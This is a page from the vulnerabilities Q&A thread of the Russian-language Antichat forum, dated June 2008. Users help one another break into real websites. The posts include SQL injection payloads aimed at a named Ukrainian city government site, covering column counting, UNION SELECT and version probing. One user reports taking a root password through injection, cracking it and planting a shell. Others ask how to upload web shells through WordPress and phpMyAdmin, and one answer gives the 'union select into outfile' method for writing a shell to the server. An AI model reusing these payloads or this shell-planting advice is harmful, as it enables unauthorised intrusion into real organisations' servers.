ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 229 из 1393 « Первая < 129179219 225 226 227 228 229 230 231 232 233 2392793297291229 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #2281  
Старый 11.06.2008, 14:37
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию
del.+
__________
Add:
А подзапросы то, оказывается, великая сила Только нудногеморная
Но доступ к серву получил,шелл залит Всем помогавшим биг рэспект!
Последний раз редактировалось Imperou$; 11.06.2008 в 15:09..
 
Ответить с цитированием

  #2282  
Старый 11.06.2008, 15:35
unit171
Новичок
Регистрация: 13.09.2007
Сообщений: 5
Провел на форуме:
23346

Репутация: 3
По умолчанию
Такой вопрос по sql-inj:

index.php?id=9999'+or+1=1/*
срабатывает как полагается (выносятся все записи)

index.php?id=9999'+or+1=2/*
срабатывает тоже как надо (пустой результат)

Но почему то, стоит добавить семиликон, всё похоже завершается ошибкой (пустой результат)
index.php?id=9999'+or+1=1;/*

В чём может быть дело. Вроде бы все субд понимают ; или нет ? Так же пробывал в URL кодировке - тоже самое
 
Ответить с цитированием

  #2283  
Старый 11.06.2008, 16:03
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
Цитата:
Сообщение от unit171  
Вроде бы все субд понимают ; или нет ?
Mysql нет , mssql да
 
Ответить с цитированием

  #2284  
Старый 11.06.2008, 16:18
unit171
Новичок
Регистрация: 13.09.2007
Сообщений: 5
Провел на форуме:
23346

Репутация: 3
По умолчанию
Цитата:
Сообщение от jokester  
Mysql нет , mssql да
Не, в смысле как разделитель он может её не воспринимть, но как конец строки - это ведь ок и в MS и в My, разве нет ? В данном случае, ведь просто в конце строки ';' стоит.
 
Ответить с цитированием

  #2285  
Старый 11.06.2008, 16:25
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
Полистай:
_https://forum.antichat.ru/threadnav43966-4-10.html
Там обсуждали
З.ы Слушай, а я ведь гоню, в конце строки должно работать, что-то я туплю
Убери "/*"
Последний раз редактировалось jokester; 11.06.2008 в 16:46..
 
Ответить с цитированием

  #2286  
Старый 11.06.2008, 17:25
unit171
Новичок
Регистрация: 13.09.2007
Сообщений: 5
Провел на форуме:
23346

Репутация: 3
По умолчанию
Цитата:
Сообщение от jokester  
Убери "/*"
Если это убрать то на сервере добавиться ' и всё превратиться в обычный строковый параметр, так что надо собственно ; убирать


Ну это особо неважно, просто наблюдение. Вот где я застопорился серьёзно:
www.city.kherson.ua/index.php?id=2351

берём кол-во параметров в select'e:
www.city.kherson.ua/index.php?id=2351'group+by+15+/*
аж 15.. извращённый запрос

www.city.kherson.ua/index.php?id=2351'+UNION+SELECT+NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL+/*

пусто. Не подскажите ? Может сильно старая версия скуля ?
Последний раз редактировалось unit171; 11.06.2008 в 17:42..
 
Ответить с цитированием

  #2287  
Старый 11.06.2008, 17:42
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию
сабж такой..есть доступ в админку и вордпресс...вопрос знатокам....как залить шелл?
через админку нереально...все файлы переделывает в 3аd4r6f3gf5 и тому подобное...
 
Ответить с цитированием

  #2288  
Старый 11.06.2008, 17:55
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
2 unit171
Там третий мускул.UNION'а нет
_http://www.city.kherson.ua/index.php?id=2351'+and+substring(version(),1,1)=3/*
А по поводу ; и -- я тебе тоже свои наблюдения высказавал.Возьми любую скуль и попробуй
Последний раз редактировалось jokester; 11.06.2008 в 17:58..
 
Ответить с цитированием

  #2289  
Старый 12.06.2008, 00:16
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию
Ситуация, получил я рута пасс через скулю,расшифровал хэш, в пхп майадмин залез (еле нашёл через гугол, руками на сайте хрен найдёшь )
Версия phpMyAdmin 2.11.2 setup.
КАк залить шелл через неё? Директории на сервере я не знаю, точнее пути. И каким видом их вписывать? В общем растолкуйте плз. Заранее спасибо.
З.Ы. Извините за тупость, я ещё только учусь
Последний раз редактировалось Imperou$; 12.06.2008 в 00:19..
 
Ответить с цитированием

  #2290  
Старый 12.06.2008, 00:23
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию
Imperou$, выполни запрос к БД union select '<?tvoy_minishell?>' into outfile 'polniy_put'_do_faila'
 
Ответить с цитированием
Ответ
Страница 229 из 1393 « Первая < 129179219 225 226 227 228 229 230 231 232 233 2392793297291229 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ